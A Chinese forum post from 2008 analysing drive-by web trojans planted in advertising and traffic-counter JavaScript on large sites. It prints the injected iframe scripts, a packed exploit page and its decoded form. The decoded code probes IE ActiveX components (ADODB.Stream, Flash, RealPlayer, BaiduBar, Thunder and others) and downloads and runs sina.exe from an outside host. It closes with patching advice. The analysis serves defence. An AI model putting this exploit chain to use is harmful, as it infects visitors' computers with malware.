近期發現多個大型網站都被掛上了網頁木馬,瀏覽該被掛馬網頁后后臺自動下載路徑為
http://eirte.cn/sina.exe下載者程序(
運行后自動下載運行作者指定的木馬程序,并試圖關閉各大殺毒軟件),國產軟件基本上無察覺,
NOD32,費爾托斯特安全均有提示,察看這些網站的源碼后發現大部分網頁木馬都被多層包含在該網站投放
廣告或流量統計的JS里.
JS包含網頁木馬:
----------------------------------click.js--------------------------------------------------
var cookieString = new String(document.cookie);
var cookieHeader = 'ises' ;
var Then = new Date();
Then.setTime(Then.getTime() + 30*60*1000 );
var beginPosition = cookieString.indexOf(cookieHeader);
if (beginPosition == -1)
{
document.write('<** height=0 frameborder=1 src=
http://yangzia.cn/page/add_54738542.htm width=100 ></**>');
document.cookie = Cookieak=ises;expires=+ Then.toGMTString() +;path=/;
}
-----------------------------------addr.js---------------------------------------------------
window[document].write('<** width=100 height=0 src=http://taiaer.cn/news.html></**>');
-------------------------------------news.html---------------------------------------------------
<**>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('n{3 b;3 1D=p m(1E.1F.1)}o(b){};q{5(b!=[4 8]){d.r('<4 1j=1k:1G-1C-1B-1x-1w 1y=19 1b=0 1e=0></4>');19[1z](c://k.l/1A.18)}}n{3 e;3 1H=1I#*&$1Q;3 P=d.1f(4);5(1h.1g.17().15(16 7)==-1)P.T(1j,1k:1R-1v-1T-1P-1O);3 1K=P.1J(1L.1M,)}o(e){};q{5(e!=[4 8]){d.r(<L t=c:\/\/k.l\/1N.1n><\/L>)}1p{n{3 f;3 1a=(p m(10.10.9)).1U($1s).1u(,)}o(f){};q{5(f!=[4 8]){5(1h.1g.17().15(16)>0){d.r('<1c t=c://k.l/'+1a[2]+'.1t></1c>')}}}n{3 g;3 E=p m(\a\a\a\1S\X\1Z\1m\v\B\x\a\a\a\S\2i\1d\C\z\N\w\K\1d\G\x\A)}o(g){};q{5(g!=[4 8]){3 Y=c://k.l/;E=d.1f(\D\2j\2g\N\O\K);Z=\J\A\w\2d\2e\J\2f\u\u\u\J\y\B\y;U=\A\J\2l\B\y\13\2k\y\1l\w\y\A\13\u;W=\O\G\M\H\z\2p\1l\w\1m\w\v\2q\u\u;E.T(\O\G\C\M\M\H\z,W+Z+U);E[\a\S\z\C\K\N](\\1V 11\\2n 11\\2m\\,Y+\a\a\x\H\R\H,,1)}}n{3 h;3 2b=p m(\X\2c\V\B\v\D\12\R\x\V\B\v\D\12\R\x\A)}o(h){};q{5(h!=[4 8]){d.r('<s 1r=1q:1o t=c://k.l/21.Q></s>')}}n{3 i;3 1i=p m(F.F.1)}o(i){};q{5(i!=[4 8]){5(p m(F.F.1).22(20)<=6.0.14.1X){d.r('<1Y 23=24 t=c:\/\/k.l\/1i.1n><\/L>')}1p{d.r('<s 1r=1q:1o t=c://k.l/2a.Q></s>')}}}n{3 j;3 I=p m(28.27)}o(j){};q{5(j!=[4 8]){I[\v\G\D\C\z\v\25](c://k.l/I.26,I.18,0)}}5(f==[4 8]&&g==[4 8]&&h==[4 8]&&i==[4 8]){n{5(p m(29.1W))d.r('<s 1b=2o 1e=0 t=c://k.l/2h.Q></s>')}o(e){}}}}',62,151,'|||var|object|if|||Error||x55||http|document|||||||eirte|cn|ActiveXObject|try|catch|new|finally|write|**|src|x42|x44|x43|x2e|x38|x64|x31|x45|x61|x6f|storm|IERPCtl|x6c|x69|Baidu|x2d|x74|**|x73|x65|x63|ado|html|x6e|x70|setAttribute|getSpraySlide|x49|helloworld2Address|x47|url|ActivePerl|ShockwaveFlash|Files|x77|x33||indexOf|msie|toLowerCase|exe|install|Flashver|width|embed|x72|height|createElement|userAgent|navigator|real|classid|clsid|x32|x41|js|none|else|display|style|version|swf|split|65A3|9A0918C52B4A|9A76|id|DownloadAndInstall|sina|44D3|D8E7|gw|Downloader|DLoader|78ABDC59|fderer|dfk|createobject|as|Adodb|Stream|ms06014|00C04FC29E36|983A|FEFsdfdsfds|BD96C556|x50|11D0|GetVariable|Program|Vod|552|sCrIpT|x52|PRODUCTVERSION|GLWORLD|PlayerProperty|LAnGuAgE|jAvAsCrIpT|x53|cab|Tool|BaiduBar|DPClient|Real|glworld|x4c|x35|x39|x34|x6a|Thunder|x67|x62|x46|x36|uusee|Common|100|x3a|x37'.split('|'),0,{}))
</**>
解密后得出:
-------------------------------------news.html解密后------------------------------------------
<**>
try{var b;var gw=new ActiveXObject(Downloader.DLoader.1)}catch(b){};finally{if(b!=[object Error]){document.write('<object classid=clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A id=install width=0 height=0></object>');install[DownloadAndInstall](http://eirte.cn/sina.exe)}}try{var e;var fderer=dfk#*&$FEFsdfdsfds;var ado=document.createElement(object);if(navigator.userAgent.toLowerCase().indexOf(msie 7)==-1)ado.setAttribute(classid,clsid:BD96C556-65A3-11D0-983A-00C04FC29E36);var as=ado.createobject(Adodb.Stream,)}catch(e){};finally{if(e!=[object Error]){document.write(<** src=http://eirte.cn/ms06014.js></**>)}else{try{var f;var Flashver=(new ActiveXObject(ShockwaveFlash.ShockwaveFlash.9)).GetVariable($version).split(,)}catch(f){};finally{if(f!=[object Error]){if(navigator.userAgent.toLowerCase().indexOf(msie)>0){document.write('<embed src=http://eirte.cn/'+Flashver[2]+'.swf></embed>')}}}try{var g;var storm=new ActiveXObject(UUUPGRADE.UUUpgradeCtrl.1)}catch(g){};finally{if(g!=[object Error]){var url=http://eirte.cn/;storm=document.createElement(object);ActivePerl=-1C59-4BBB-8E8;getSpraySlide=1-6E83F82C813B;helloworld2Address=clsid:2CACD7BB;storm.setAttribute(classid,helloworld2Address+ActivePerl+getSpraySlide);storm[Update](\Program Files\Common Files\uusee\,url+UU.ini,,1)}}try{var h;var glworld=new ActiveXObject(GLIEDown.IEDown.1)}catch(h){};finally{if(h!=[object Error]){document.write('<** style=display:none src=http://eirte.cn/GLWORLD.html></**>')}}try{var i;var real=new ActiveXObject(IERPCtl.IERPCtl.1)}catch(i){};finally{if(i!=[object Error]){if(new ActiveXObject(IERPCtl.IERPCtl.1).PlayerProperty(PRODUCTVERSION)<=6.0.14.552){document.write('<sCrIpT LAnGuAgE=jAvAsCrIpT src=http://eirte.cn/real.js></**>')}else{document.write('<** style=display:none src=http://eirte.cn/Real.html></**>')}}}try{var j;var Baidu=new ActiveXObject(BaiduBar.Tool)}catch(j){};finally{if(j!=[object Error]){Baidu[DloadDS](http://eirte.cn/Baidu.cab,Baidu.exe,0)}}if(f==[object Error]&&g==[object Error]&&h==[object Error]&&i==[object Error]){try{if(new ActiveXObject(DPClient.Vod))document.write('<** width=100 height=0 src=http://eirte.cn/Thunder.html></**>')}catch(e){}}}}
</**>
智能型的網頁木馬,利用COOKIE做判斷,一臺
電腦24小時內有效讀取一次該代碼.利用了多種第三方程序漏洞:FLASH播放器 realplay播放器,百度搜霸工具條,訊雷漏洞,所以一定要打好系統和第三方軟件的全補丁,建議大家下載一個360安全衛士,用來打補丁還是很不錯的
- 該帖于 2008-7-18 11:45:00 被修改過
